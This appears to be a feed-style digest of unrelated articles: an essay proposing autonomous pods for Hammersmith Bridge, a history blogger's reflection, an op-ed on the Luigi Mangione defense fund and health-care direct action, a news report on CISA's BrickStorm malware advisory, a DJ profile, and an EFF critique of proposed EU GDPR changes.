Since 2019, the entire urban transport landscape has transformed through three major forces largely independent of the bridge closure.

The pandemic (normalising remote work and collapsing commuter traffic), regulatory changes (Low Traffic Neighbourhoods, ULEZ expansion, 20mph zones), and new infrastructure (Elizabeth line, expanded cycling networks).

Disentangling the bridge closure’s impact from these forces is nearly impossible, so these changes cannot all be attributed definitively to the closure.

But one impact is clear: west London has adapted to reduced car dependency regardless of whether the bridge closure drove or merely coincided with these changes.

It is not necessarily the case that closing bridges improves transport; but it is undeniably true that people and places adapt when given alternatives.

Infrastructure shapes behaviour.

The closure has created genuine hardship for specific groups.

Elderly and disabled residents have been significantly disadvantaged, having lost direct bus routes across the river to Hammersmith with its step-free Tube access, retail outlets and major hospital. 36 Low-income residents have been disproportionately affected. They’re less likely to own cars or bikes, cannot afford taxi detours, and have lost affordable public transport options. Parents with young children face new challenges. Cycling is not always an option, so any journey across the river has become significantly harder.

Specialised retailers have also lost business. Whilst generic local businesses saw spending increases, specialised retailers relying on customers from across London experienced revenue reductions. Similarly, tradespeople and businesses requiring vehicle access face longer detours. Plumbers, electricians, and builders transporting heavier tools lose time and income. Commercial motorised vehicles merit particular attention given ULEZ parallels, where delivery operators have raised concerns about regulatory burdens. However, unlike ULEZ, the bridge closure affects routing rather than compliance costs.

As a local resident who crosses the bridge every week, I see both sides of this argument:

For certain residents and businesses, the closure has created genuine hardship. Equally, however, the constant gridlock has vanished, the local economy has adapted, and cycling - previously a life-threatening exercise - is now pleasant and safe.

The harms are real, but they do not require a £250m car-restoration project. They require targeted public transport solutions.

Ask residents if they want the bridge reopened to all traffic and the answer is obvious: yes.

Maximum choice will always seem the most convenient option.

But that is the wrong question to be asking. As we have established, a full restoration would cost £250m, take years, and likely require a significant vehicle toll.

Given that reality, what’s the best option?

A 2023 poll tested this exact trade-off, and the response from residents was clear. If the alternative was a toll bridge, 50% of respondents would prefer a car-free bridge with cycling, walking and electric shuttles, with 36% in favour of tolling. Similar results were shown in a FareCity survey from 2019.

Given the actual constraints and costs, residents prefer targeted public transport solutions over expensive vehicular restoration.

Finally, we should address a claim that has shaped the entire debate.

Labour Council leader Stephen Cowan has repeatedly stated that the bridge is “legally required to reopen to cars,” indicating that the Secretary of State instructed him on the council’s “Highways obligations.” This assertion has anchored political negotiations around how to restore full vehicular capacity. Mayor Sadiq Khan has also expressed a desire to re-open the bridge to cars .

But in November 2022, the Department for Transport’s Freedom of Information response categorically contradicted this claim:

“The Department has not given any legal instructions to London Borough of Hammersmith and Fulham regarding the management of the bridge – officials and Ministers have been clear that LBHF is the asset owner and decisions on maintenance and repair are for it to take.”

As the owner, there is no clear legal requirement for the Council to reopen the bridge to cars (as they have likely met their statutory obligations, 37 although any formal highway downgrading would require Traffic Regulation Orders under established statutory procedures). 38

This distinction is not semantic pedantry. If the obligation is political rather than statutory, then the solution space is fundamentally different. The council is not legally bound to pursue a £250m vehicular restoration. It could instead solve the actual mobility problem: providing public transport across the river for those who need it (which may itself be a statutory obligation). 39

Yet this premise has locked the debate around restoring the existing structure to full vehicular capacity.

So what might a solution look like?

In May 2023, a credible and equitable solution for Hammersmith Bridge was proposed, fully designed and costed.

It cost £10m (a twenty-fifth of the Foster & Partners solution), permitted cycling and walking, fulfilled public transport needs, and crucially abided by the stabilisation’s weight restrictions.

Ten-passenger autonomous electric pods , running every 2-3 minutes during peak times. Each pod weighs under 3 tonnes when fully loaded , comfortably within the bridge’s limits. The fleet would carry 235-282 passengers per hour . Full integration with Oyster cards and contactless payment. A protected two-way cycle lane alongside and pedestrian walkways. Restructured bus routes. The pods would operate in a single lane with passing points at either end. 40
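Those headline numbers hang together. A quick sanity check of the quoted throughput from the stated headway and pod capacity (figures as reported from the proposal):

# Throughput implied by 10-passenger pods at 2-3 minute headways.
pod_capacity = 10
for headway_min in (2.0, 2.5, 3.0):
    pods_per_hour = 60 / headway_min
    print(f"{headway_min:.1f} min headway: {pods_per_hour * pod_capacity:.0f} passengers/hour")

Two- to three-minute headways give 200-300 passengers per hour, neatly bracketing the quoted 235-282 once load factors and turnaround at the passing points are accounted for.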

Total cost: £10m . Pod fleet (£3m), highways remodelling (£3.7m), public realm improvements (£0.5m), contingency (£2.8m). Timeline: 24-36 months from approval to operational.

The charity Possible spent 18 months developing this autonomous pod system for Hammersmith Bridge. The solution uses proven technology from New Zealand provider Ohmio . The pods are already used today in New Zealand and multiple international airports .

This solution addresses the genuine harms identified earlier. The autonomous pod system provides:

  • Public transport for those without alternatives : elderly and disabled residents regain direct access to Hammersmith with step-free boarding, young families can cross safely, low-income residents get affordable Oyster-integrated transport.

  • Reduced congestion for essential and commercial vehicle users : with 9,000 trips already evaporated and additional travellers using pods, tradespeople and businesses would experience a net benefit from reduced congestion on alternative crossings.

This is why the pod solution isn’t just cheaper than the £250m restoration - it’s better.

Why autonomous pods rather than conventional public transport? Standard buses weigh 12-18 tonnes, far exceeding the bridge’s 3-tonne limit. Trams require expensive track infrastructure and permanent structural modifications, the weight of which would be incompatible with heritage constraints. 41 Autonomous pods solve this through lightweight design: each 10-passenger pod weighs under 3 tonnes fully loaded, with ten pods providing equivalent capacity whilst staying within structural limits. The system eliminates driver costs (60-70% of bus operating expenses) whilst enabling 2-3 minute headways impossible with human drivers, maximising throughput and cost-efficiency.

Would the pods risk obsolescence? After all, a restored bridge might serve for decades while autonomous technology is evolving rapidly. But in a rapidly changing transport landscape, the pods deliver adaptable infrastructure with manageable operating costs. Vehicles can be upgraded as technology improves at minimal cost and could be operated publicly like TfL services or through private concession with access leasing and passenger charges. In any case, the pods cost a fraction of the £250m restoration which would likely require perpetual subsidy for changing traffic patterns.

Barriers to implementation exist, but none are insurmountable. The Automated Vehicles Act 2024 already provides a legal framework, while Milton Keynes and Solihull already operate these exact Ohmio vehicles on public roads. The most likely bridge-specific challenges - weight certification, vibration testing, structural approval - are procedural requirements, not engineering barriers.

This proposal solves the actual mobility problems faced by local communities rather than restoring a traffic pattern that was already causing gridlock.

Here is the digital visualisation of the proposal (no sound):

What happened to this proposal?

The Centre for Connected and Autonomous Vehicles offered £200,000 for feasibility studies. Possible assembled a consortium including Ohmio, City Science, and City Infinity. Richmond Council and TfL both agreed to support if Hammersmith & Fulham agreed.

Hammersmith & Fulham refused to engage. The deadline passed. The consortium disbanded.

Since then, Ohmio has begun trials in Solihull and Milton Keynes . Waymo and Wayve will trial autonomous taxi services in London in 2026.

The opportunity for the UK’s first autonomous public transport deployment was lost, but the solution remains viable.

Left: Waymo (2025); Right: Ohmio (2024)

What needs to happen now?

  1. End the pretence. LBHF, TfL and DfT must publicly acknowledge what everyone privately knows : the restoration (£250m+) is unfunded and any replacement (£150m+) is equally unfundable.

  2. Open a competitive tender. Tender for public transport solutions within the stabilised bridge’s 3-tonne weight limit. Offer clear requirements: passengers per hour, Oyster integration, delivery timeline. Let the market find the most cost-effective solution. Fast-track regulatory approval for the winning proposal. No multi-year planning inquiries for a bridge that’s already been closed for six years.

  3. Create the destination, invest in the approaches. All three bodies also need to invest in regenerating the areas at either end: retail outlets, cycling infrastructure, public realm upgrades, drainage improvements (co-ordinated with the Hammersmith Flyover redevelopment if that proceeds).

Recently, there have been some more positive signs. Various local politicians have begun to more clearly express support for prioritising a public transport solution over simply re-introducing cars. LBHF recently trialled yellow rental carts, demonstrating an appetite for testing new modes of transport.

The Possible proposal would have been the UK’s first autonomous vehicle deployment in real-world public transport.

Hammersmith Bridge offers the perfect testing ground: dedicated straight lanes, low speed, controlled environment. The Government has stated its ambition for technology leadership in autonomous vehicles.

That opportunity was lost when LBHF refused to engage, but it can still be seized.

The bridge is stabilised. The community has adapted. The technology exists. What’s required is simply the political will to choose the future.

Hammersmith Bridge could become a place where Victorian ironwork frames cutting-edge technology. London’s greenest historic crossing could be the testing ground for Britain’s most advanced public transport solution.

Picture it at dusk: Victorian lampposts glowing, pods gliding silently past, cyclists heading home, swans drifting along the Thames below. The bridge would no longer be a bottleneck that motorists endure, but a bridge people choose to cross.

Designed thoughtfully, Hammersmith Bridge’s public transport vehicles could become a timeless and recognisable feature of London’s urban landscape, alongside other distinctive British icons — red telephone boxes, double-decker buses, or black cabs.

An imagined design. Source: Author

That’s the future for Britain that we should be building - one that is even more beautiful than the past we’re failing to resurrect.

Hammersmith Bridge can be one of the greatest river crossings in the world.

Please do get in touch if you are in a position to help solve this challenge or have any feedback.

Let’s build the future.

Will this solution help us solve the vast problem of Britain’s state crisis?

Of course not. 42

But Hammersmith Bridge teaches a lesson.

Here, the intuitive question based on past assumptions was “how do we restore full vehicular capacity?” The real question we should have been asking ourselves is “how do we solve this mobility problem to ensure a better future?”

While we debate how to restore Victorian infrastructure for outdated traffic patterns, the actual future, autonomous and mass public transport, is materialising around us.

In that sense, Hammersmith Bridge serves as a warning.

If we can’t adapt our thinking here, what hope is there for the toughest problems that we face? For the infrastructure that Britain actually needs to build? For the critical state capacity that we most urgently need to develop? 43

Hammersmith Bridge is the case study; now Britain must start asking the right questions.

This essay was possible because kind people cared enough to help.

Above all, I would like to thank Leo Murray , who led the charity Possible and wrote a definitive report on Hammersmith Bridge that informed so much of this piece.

Tom Pike, Tim Lennon, and Charles Campion generously shared their expertise, data, and years of work on this problem. Their rigorous research and genuine commitment to solving the bridge’s crisis made this analysis possible.

The Looking for Growth team , Lawrence, Ludo, and Jack, provided invaluable support and encouragement throughout.

I am deeply grateful also to friends Quentin, Aeron, Paramvir, Bob and Jemima, who read early drafts and offered thoughtful feedback.

Finally, my most sincere apologies to every friend, family member, and innocent bystander who endured my monologues about Hammersmith Bridge these past months.

Thanks for reading Suburban Mantuan! This post is public so feel free to share it.


Disclaimer : All posts on this site reflect my personal views only and should not be construed as investment, financial, or professional advice. These views do not represent my employer or any affiliated organisation.


I have been writing a niche history blog for 15 years

Hacker News
resobscura.substack.com
2025-12-04 18:49:20
Comments...
Original Article

I was 25 years old when I started writing the blog version of Res Obscura, which ran from 2010 to 2023 (and still exists here ). This was the early summer of 2010. I was a second-year PhD student in history, living with two roommates in a 1920s bungalow on the east side of Austin.

And I was very dedicated to the idea that you should aim to write a new blog post every day:

The first few posts of Res Obscura, all written in an apparently rather frantic week in June of 2010.

This is a concept that the 40-year-old version of me, with two young kids and zero free time, cannot even begin to fathom.

It’s also a practice of the old internet that simply doesn’t exist anymore — one of many digital behaviors that were swallowed up by social media. That whole world of blogging (exploratory, low-stakes, conversational, and assuming a readership of people who had bookmarked your URL and read it on a desktop or laptop computer) is almost entirely gone now.

My first two years writing Res Obscura in its blog format were great fun. I began to develop an intellectual community, forming contacts with, for instance, the wonderful Public Domain Review (founded 2011 and still going strong). I linked to and was linked to by a range of other history bloggers who I saw as kindred spirits, some of whom seem to have disappeared ( BibliOdyssey ), others of whom have become well-known writers ( Lindsey Fitzharris ).


It was pretty addictive when a post went viral. In those halcyon days when written blog posts about obscure historical subjects were viable sources of viral content, you could end up getting covered in international media for, say, discovering a cat’s paw prints on a 15th century Croatian manuscript.

Readership analytics for the pre-Substack Res Obscura, 2010-present.

That spike in readership around 2018 was partially from a post about 17th century food that, unexpectedly, led to me speaking about snail water on New Zealand public radio .

But by then, I was starting to move on. I was hard at work on my first book — the book I needed to write for tenure — and was becoming a bit dispirited by the increasingly click-bait nature of blogging, not to mention the tendency of social media to elevate toxic behavior and controversy over lovely and fascinating but totally uncontroversial things like the Croatian cat paw prints.

I also (then and now) have no appetite for short-form video content, and still less for the type of history explainer videos — “here’s a two hour deep dive into why this movie is historically inaccurate” or “everything you need to know about such-and-such famous person” — that seem to do well on YouTube.

Switching over to a Substack newsletter, in the summer of 2023 , revived my interest in writing online. It felt like rejoining an intellectual community — not quite the same as the golden age of blogging in the 2000s, but something just as lively, in a way that I don’t think gets quite enough credit in the 2020s.

From Weird Medieval Guys to Noted to the Fernando Pessoa-esque The Hinternet and the newsletters of well-known historians like David Bell ( French Reflections ), as well as the more general audience or politically oriented newsletters that still dig deep into historical topics (like Unpopular Front ), I would say that Substack is now the most interesting place online for discussions not just of history, but of humanistic topics as a whole.

Needless to say, there’s also a ton of people writing about the intersection of AI, technology and contemporary society (of which I would single out AI Log and Ethan Mollick’s One Useful Thing ).

So why have I kept writing Res Obscura through all the changes of the world — and of my own life and interests — since the summer of 2010? Simple: I love sharing things I find interesting, especially things which are not available elsewhere online. Most of my posts are written because I search for information on something and don’t find it.

The niche nature of Res Obscura (from 17th century cocaine to Kinetoscopes to Henry James: the RPG ) is precisely why I enjoy writing it.

I am deeply grateful that 15 years and 8,300 subscribers later, I have a place online where I can share idiosyncratic knowledge and writing with an equally idiosyncratic group of readers.

Now here’s the inevitable part where I ask if you would be willing to support my continued work. To that end, I have set up a special holiday discount valid until the end of December. Thank you for reading!


A detail of a trompe-l’œil “dome” by the Renaissance painter Andrea Mantegna , Camera degli Sposi, Ducal Palace, Mantua, Italy. Featured in a 2011 Res Obscura post called “ The Art of Fooling the Eye .”


Luigi, a Year Later: How to Build a Movement Against Parasitic Health Insurance Giants

Intercept
theintercept.com
2025-12-04 18:48:04
The widespread support for Mangione shows America is ready to mobilize to build a more humane health care system. The post Luigi, a Year Later: How to Build a Movement Against Parasitic Health Insurance Giants appeared first on The Intercept....
Original Article
Luigi Mangione appears for the second day of a suppression of evidence hearing in the killing of UnitedHealthcare CEO Brian Thompson in Manhattan Criminal Court on Dec. 2, 2025 in New York City. Photo: Curtis Means/Pool via Getty Images

Sam Beard is a spokesperson for the December 4 Legal Committee, whose book Depose: Luigi Mangione and the Right to Health is available for pre-order at illwilleditions.com.

Luigi Mangione’s legal defense fund has swelled to more than $1.3 million and is still growing daily. As the December 4 Legal Committee, we created that fund — but it would mean nothing without the donations, prayers, and support of people from around the world. As corporate social media platforms censored support for Luigi , the fundraiser page became a place for people to share stories of senseless death and suffering at the hands of the for-profit health insurance industry in this country.

There is a deep irony in the widespread support for Luigi. People celebrate an alleged murderer not because they hate reasonable debate or lust for political violence, but out of respect for themselves and love for others. Across the political spectrum, Americans experience the corporate bureaucracies of our health care system as cruel, exploitative, and maddening. They feel powerless in the face of the unnecessary dehumanization, death, and financial ruin of their neighbors and loved ones.

One year ago, the December 4 killing of United Healthcare CEO Brian Thompson temporarily suspended the usually intractable left vs. right polarization of America. Ben Shapiro’s audience revolted when he accused Luigi supporters of being “evil leftists.” Donors to Luigi’s fund come from across the political spectrum, and a common theme among them is their acute realization that the political differences of the culture war are largely manufactured to benefit the powerful. This was a crucial difference between Mangione’s alleged act and, for example, the assassination of Charlie Kirk . While the latter intensified existing political divides , the former seemed to strike upon the common ground of a different political landscape: from red vs. blue, or left vs. right, to down vs. up .

Luigi Mangione’s mugshot painted by the artist Sam McKinniss. Courtesy: Sam McKinniss

But a year on, it is clear that even bipartisan public support for killing a health care CEO on the street and the endless stories of suffering and death as a result of insurance claim denials are not enough to depose the for-profit health care system. Today, Medicare for All looks even more politically unrealistic than when Bernie Sanders made it the centerpiece of his presidential campaign.

This fact poses a challenge for Luigi’s supporters: Will his alleged act be remembered as nothing more than a salacious contribution to the true crime genre? Will we settle for him being installed as an edgy icon of celebrity culture, used to market fast-fashion brands and who knows what next?

We do not think his supporters, or anyone else who believes that health care is a human right, should accept that. But what would it take to make the events of last December 4 into a movement to build a more humane health care system in America?

The time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.

For the last year, we have been asking this question of medical professionals, community organizers, scholars, and ourselves.

In our forthcoming book , “Depose: Luigi Mangione and the Right to Health,” we offer the beginnings of an answer: The history of the struggle for the right to health in America shows that it is indeed politically unrealistic to expect politicians to deliver it from above — but our own dignity and intelligence demands that this right be asserted by all of us from below. The widespread support for Luigi shows that the time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.

Consider the sit-in movements to end Jim Crow laws and desegregate American cities. These were protests, insofar as participants drew attention to unjust laws — but they were also political direct actions. Organizers were collectively breaking those laws, and in doing so, were enacting desegregation . Activists organized themselves to support and protect each other in collectively nullifying laws that had no moral authority and, in the process, acted as if they were already free. This is what we mean by a shift from protest to direct action.

Less well known is the role of direct action in winning the eight-hour workday . For half a century, industrial workers had been struggling to shorten their hours so they could have some rest and joy in their lives. One decisive moment in this struggle came in 1884, when the American Federation of Labor resolved that two years later, on May 1, their workers would enact the eight-hour day. After eight hours, they would go on strike and walk off the job together. They called on other unions around the country to do the same and a number did — including in Chicago, where police deployed political violence to attack striking workers, killing two. While this action did not immediately win the struggle everywhere, it did succeed in beginning to normalize the eight-hour day and raised the bar for everywhere else to eventually do the same. The key is that this could only happen when workers stopped demanding something politically unrealistic and started changing political reality themselves.

The struggle for the right to health care has been ongoing in the United States for at least a century. At every turn, it has been thwarted by industry lobbyists and the politicians they control . But what would it look like to strategically shift the struggle for the right to health care in the U.S.? How would health care providers go on strike or engage in direct action without harming patients?

We found the beginning of an answer from Dr. Michael Fine, who has called on his fellow physicians to organize for a different kind of strike: not halting all their labor, but stopping the aspects of their work that are unrelated to their responsibility as healers. Fine writes, “We need to refuse, together, to use the electronic medical records until they change the software so that those computers free us to look at and listen to patients instead of looking at and listening to computer screens.”

All of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.

A strike by health care workers could mean not the cessation of care, but liberating this critical work from the restraints imposed by profit-seeking companies . Beginning from this idea, all of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.

If we step outside of our usual political bubbles and into a direct action movement to assert the universal right to health care, we might find that the common ground that Luigi’s alleged actions exposed is the precise point from which the wider political landscape may be remade.

APL for Plan9

Lobsters
apl.pmikkelsen.com
2025-12-04 18:27:17
Comments...
Original Article

Introduction

This is the website for APL9, which is an APL implementation written in C on and for Plan 9 (9front specifically, but the other versions should work as well).

Work started in January 2022, when I wanted to do some APL programming on 9front, but no implementation existed. The focus has been on adding features and behaving (on most points) like Dyalog APL . Speed is poor, since many primitives are implemented in terms of each other, which is not optimal, but it made implementing them easier.

Note: development is still very much on-going. Some primitives may be implemented wrong at this point, since it can be hard to implement them without ever having used them ☺.

Features

  • Dfns work, but the error guards are not implemented yet
  • Function trains
  • Most primitive functions from Dyalog APL
  • Some of the primitive operators from Dyalog APL
  • Box printing (by default)

For more information, see Implementation Status .

Notable differences from Dyalog APL

  • No bracket axis
  • No bracket indexing
  • No tradfn syntax
  • No complex numbers (might change later)
  • ⍺⍺ is changed to
  • ⍵⍵ is changed to
  • Outer product ∘. is changed to
  • Dop self reference ∇∇ is changed to and for monadic and dyadic operators respectively

Installation

Installation is as simple as cloning and running mk .

git/clone https://git.sr.ht/~pmikkelsen/APL9
cd APL9
mk
% set the BIN environment variable if
% you don't want it to install globally
mk install

The resulting binary is installed as apl . At the time of writing, it doesn't take command line arguments (apart from -t and -m for debugging).

Remember to use a font that can display the glyphs! To be able to write the APL glyphs, a small script is provided with the name aplkeys which works on 9front. Usage is as follows:

% Say my normal kbmap is called dk, but I want to be able to write APL symbols
aplkeys dk

The layout is mostly the same as the one on X11 on Linux, but the way to access the symbols is different. In order to get the "normal" layer, such as ⍺⍳⍵∊* and so on, hold down Mod4 (the windows key) while typing (in this case, typing aiwep). To access the other layer, hold down Mod4 and Alt-gr at the same time, to get ⍶⍸⍹⍷⍣ and so on. Please email me if you have questions about this.

Screenshot

A picture of APL9 in action

CISA warns of Chinese "BrickStorm" malware attacks on VMware servers

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 18:19:55
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned network defenders of Chinese hackers backdooring VMware vSphere servers with Brickstorm malware. [...]...
Original Article


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned network defenders of Chinese hackers backdooring VMware vSphere servers with Brickstorm malware.

In a joint malware analysis report with the National Security Agency (NSA) and Canada's Cyber Security Centre, CISA says it analyzed eight Brickstorm malware samples.

These samples were discovered on networks belonging to victim organizations, where the attackers specifically targeted VMware vSphere servers to create hidden rogue virtual machines to evade detection and steal cloned virtual machine snapshots for further credential theft.

As noted in the advisory, Brickstorm uses multiple layers of encryption, including HTTPS, WebSockets, and nested TLS to secure communication channels, a SOCKS proxy for tunneling and lateral movement within compromised networks, and DNS-over-HTTPS (DoH) for added concealment. To maintain persistence, Brickstorm also includes a self-monitoring function that automatically reinstalls or restarts the malware if interrupted.

While investigating one of the incidents, CISA found that Chinese hackers compromised a web server in an organization's demilitarized zone (DMZ) in April 2024, then moved laterally to an internal VMware vCenter server and deployed malware.

The attackers also hacked two domain controllers on the victim's network and exported cryptographic keys after compromising an Active Directory Federation Services (ADFS) server. The Brickstorm implant allowed them to maintain access to the breached systems from at least April 2024 through September 2025.

After obtaining system access, they've also been observed capturing Active Directory database information and performing system backups to steal legitimate credentials and other sensitive data.

Hackers' lateral movement in the victim's network (CISA)

To detect the attackers' presence on their networks and block potential attacks, CISA advises defenders (especially those working for critical infrastructure and government organizations) to scan for Brickstorm backdoor activity using agency-created YARA and Sigma rules, and block unauthorized DNS-over-HTTPS providers and external traffic.

They should also take inventory of all network edge devices to monitor for suspicious activity and segment the network to restrict traffic from demilitarized zones to internal networks.

"CISA, NSA, and Cyber Centre urge organizations to use the indicators of compromise (IOCs) and detection signatures in this Malware Analysis Report to identify BRICKSTORM malware samples," the joint advisory urges. "If BRICKSTORM, similar malware, or potentially related activity is detected, CISA and NSA urge organizations to report the activity as required by law and applicable policies."

Today, cybersecurity firm CrowdStrike also linked Brickstorm malware attacks targeting VMware vCenter servers on the networks of U.S. legal, technology, and manufacturing companies throughout 2025 to a Chinese hacking group it tracks as Warp Panda. CrowdStrike observed the same threat group deploying previously unknown Junction and GuestConduit malware implants in VMware ESXi environments.

The joint advisory comes on the heels of a Google Threat Intelligence Group (GTIG) report published in September that described how suspected Chinese hackers used the Brickstorm malware (first documented by Google subsidiary Mandiant in April 2024 ) to gain long-term persistence on the networks of multiple U.S. organizations in the technology and legal sectors.

Google security researchers linked these attacks to the UNC5221 malicious activity cluster, known for exploiting Ivanti zero-days to target government agencies with custom Spawnant and Zipline malware.


DJ Ushka Wants the Club to Be Your Temple

hellgate
hellgatenyc.com
2025-12-04 18:07:50
DJ and activist Thanushka Yakupitiyage recommends cutting-edge spaces and leftist magazine parties in the next few weeks....
Original Article

Brooklyn-based DJ and immigrant rights and climate activist Thanushka Yakupitiyage , better known as DJ Ushka, builds alternate realities with sets that mix Bollywood and baile funk, bachata, and Shakira.

She performed at this summer's Planet Brooklyn with a soundsystem , a loudspeaker conglomeration that can be heard throughout an entire street party. The practice originated in Kingston, Jamaica, and is typically associated with dancehall and other Caribbean styles of music. (You'll see a lot of them at the West Indian Day Parade .) She told me that the one she used was built by her friend, the musician Anik Khan , in Bangladesh's capital, Dhaka.

Yakupitiyage, who currently works on sustainable policy initiatives at the Surdna Foundation , said she started DJing to be part of how queer people of color in New York were finding community on the dance floor.

"In 2011, I came into DJing when I was doing immigrant and refugee rights work," Yakupitiyage told me. She is an immigrant herself, originally from Sri Lanka and Thailand, who moved to the U.S. when she was 18 to attend college in Massachusetts. After graduating in 2007, she moved to New York City. "As an immigrant, I've experienced all of the difficulties of what it means to be able to stay in and make New York my home."

As she worked on immigrant support campaigns in the city, she began to see the club as a place of refuge: "I joke that some people go to church or temple, I go to the club."

She quickly realized that while the New York club scene of the 2010s had a dearth of women of color, immigrants, and queer people, that was changing fast. Party producers "with a sort of political analysis based on the issues that I was working on" were popping up, fulfilling, as she put it, "the need for joyful spaces when we live in a really chaotic time."

She cut her teeth at parties like QUE BAJO!? by DJs Uproot Andy and Geko Jones, and queer parties like Azucar; SWEAT, a party run by Khane Kutzwell ; and, eventually, Papi Juice, whose organizers she says are now "like family."

Since Yakupitiyage has been working as a multi-disciplinary artist on projects and parties for more than a decade, I asked her what her wildest dreams were for a new era of New York City culture .

"It's very, very difficult to be a full-time artist or DJ in New York," Yakupitiyage said. "I'd like to see the City really think about how they can create opportunities, expand grant opportunities for artists, and incorporate nightlife cultural workers as a part of broader artistic endeavors."

Here's where the DJ who can do it all is partying in the next two weeks:


EU's New Digital Package Proposal Promises Red Tape Cuts but Guts GDPR Privacy Rights

Electronic Frontier Foundation
www.eff.org
2025-12-04 18:04:14
The European Commission (EC) is considering a “Digital Omnibus” package that would substantially rewrite EU privacy law, particularly the landmark General Data Protection Regulation (GDPR). It’s not a done deal, and it shouldn’t be.The GDPR is the most comprehensive model for privacy legislation aro...
Original Article

The European Commission (EC) is considering a “Digital Omnibus” package that would substantially rewrite EU privacy law, particularly the landmark General Data Protection Regulation (GDPR). It’s not a done deal, and it shouldn’t be.

The GDPR is the most comprehensive model for privacy legislation around the world. While it is far from perfect and suffers from uneven enforcement, complexity, and certain administrative burdens, the omnibus package is full of bad and confusing ideas that, on balance, will significantly weaken privacy protections for users in the name of cutting red tape. It contains at least one good idea: improving consent rules so users can automatically set consent preferences that will apply across all sites. But much as we love limiting cookie fatigue, it’s not worth the price users will pay if the rest of the proposal is adopted.

The EC needs to go back to the drawing board if it wants to achieve the goal of simplifying EU regulations without gutting user privacy. Let’s break it down.

Changing What Constitutes Personal Data

The digital package is part of a larger Simplification Agenda to reduce compliance costs and administrative burdens for businesses, echoing the Draghi Report’s call to boost productivity and support innovation. Businesses have been complaining about GDPR red tape since its inception, and new rules are supposed to make compliance easier and turbocharge the development of AI in the EU. Simplification is framed as a precondition for firms to scale up in the EU, ironically targeting laws that were also argued to promote innovation in Europe. It might also stave off tariffs the U.S. has threatened to levy, thanks in part to heavy lobbying from Meta and tech lobbying groups.

The most striking proposal seeks to narrow the definition of personal data, the very basis of the GDPR. Today, information counts as personal data if someone can reasonably identify a person from it, whether directly or by combining it with other information.

The proposal jettisons this relatively simple test in favor of a variable one: whether data is “personal” depends on what a specific entity says it can reasonably do or is likely to do with it. This selectively restates part of a recent ruling by the EU Court of Justice but ignores the multiple other cases that have considered the issue.

This structural move toward entity-specific standards will create massive legal and practical confusion, as the same data could be treated as personal for some actors but not for others. It also creates a path for companies to avoid established GDPR obligations via operational restructuring to separate identifiers from other information—a change in paperwork rather than in actual identifiability. What’s more, it will be up to the Commission, a political executive body, to define what counts as unidentifiable pseudonymized data for certain entities.

Privileging AI

In the name of facilitating AI innovation, which often relies on large datasets in which sensitive data may residually appear, the digital package treats AI development as a “legitimate interest,” which gives AI companies a broad legal basis to process personal data, unless individuals actively object. The proposals gesture towards organisational and technical safeguards but leave companies broad discretion.

Another amendment would create a new exemption that allows even sensitive personal data to be used for AI systems under some circumstances. This is not a blanket permission: “organisational and technical measures” must be taken to avoid collecting or processing such data, and proportionate efforts must be made to remove them from AI models or training sets where they appear. However, it is unclear what will count as appropriate or proportionate measures.

Taken together with the new personal data test, these AI privileges mean that core data protection rights, which are meant to apply uniformly, are likely to vary in practice depending on a company’s technological and commercial goals.

And it means that AI systems may be allowed to process sensitive data even though non-AI systems that could pose equal or lower risks are not allowed to handle it.

A Broad Reform Beyond the GDPR

There are additional adjustments, many of them troubling, such as changes to rules on automated decision-making (making it easier for companies to claim it’s needed for a service or contract), reduced transparency requirements (less explanation about how users’ data are used), and revised data access rights (supposed to tackle abusive requests). An extensive analysis by the NGO noyb can be found here.

Moreover, the digital package reaches well beyond the GDPR, aiming to streamline Europe’s digital regulatory rulebook, including the e-Privacy Directive, cybersecurity rules, the AI Act, and the Data Act. The Commission also launched “reality checks” of other core legislation, which suggests it is eyeing other mandates.

Browser Signals and Cookie Fatigue

There is one proposal in the Digital Omnibus that actually could simplify something important to users: requiring online interfaces to respect automated consent signals, allowing users to automatically reject consent across all websites instead of clicking through cookie popups on each. Cookie popups are often designed with “dark patterns” that make rejecting data sharing harder than accepting it. Automated signals can address cookie banner fatigue and make it easier for people to exercise their privacy rights.
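One signal of this kind already exists in the wild: Global Privacy Control, which participating browsers send as a "Sec-GPC: 1" request header. As a minimal sketch of what honoring such a signal could look like server-side (the handler and function names below are illustrative assumptions, not anything defined in the Commission's proposal):

# Illustrative sketch only: honoring a GPC-style automated consent signal
# server-side instead of relying on a cookie banner. The Sec-GPC header is
# the real Global Privacy Control signal; the handler names are hypothetical.

def user_opted_out(headers: dict) -> bool:
    """Treat Sec-GPC: 1 as a blanket refusal of consent-based tracking."""
    return headers.get("Sec-GPC", "").strip() == "1"

def handle_request(headers: dict) -> str:
    if user_opted_out(headers):
        # The signal already answered; no trackers, no popup.
        return "serve page without trackers"
    # Only now would a (non-deceptive) consent prompt be appropriate.
    return "serve page with consent prompt"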

While this proposal is a step forward, the devil is in the details: First, the exact format of the automated consent signal will be determined by technical standards organizations where Big Tech companies have historically lobbied for standards that work in their favor. The amendments should therefore define minimum protections that cannot be weakened later.

Second, the provision takes the important step of requiring web browsers to make it easy for users to send this automated consent signal, so they can opt out without installing a browser add-on.

However, mobile operating systems are excluded from this latter requirement, which is a significant oversight. People deserve the same privacy rights on websites and mobile apps.

Finally, exempting media service providers altogether creates a loophole that lets them keep using tedious or deceptive banners to get consent for data sharing. A media service’s harvesting of user information on its website to track its customers is distinct from news gathering, which should be protected.

A Muddled Legal Landscape

The Commission’s use of the "Omnibus" process is meant to streamline lawmaking by bundling multiple changes. An earlier proposal kept the GDPR intact, focusing on easing the record-keeping obligation for smaller businesses—a far less contentious measure. The new digital package instead moves forward with thinner evidence than a substantive structural reform would require, violating basic Better Regulation principles, such as coherence and proportionality.

The result is the opposite of “simple.” The proposed delay of the high-risk requirements under the AI Act to late 2027—part of the omnibus package—illustrates this: businesses will face a muddled legal landscape as they must comply with rules that may soon be paused and later revived. This sounds like “complification” rather than simplification.

The Digital Package Is Not a Done Deal

Evaluating existing legislation is part of a sensible legislative cycle, and clarifying and simplifying complex processes and practices is not a bad idea. Unfortunately, the digital package misses the mark by making processes even more complex, at the expense of personal data protection.

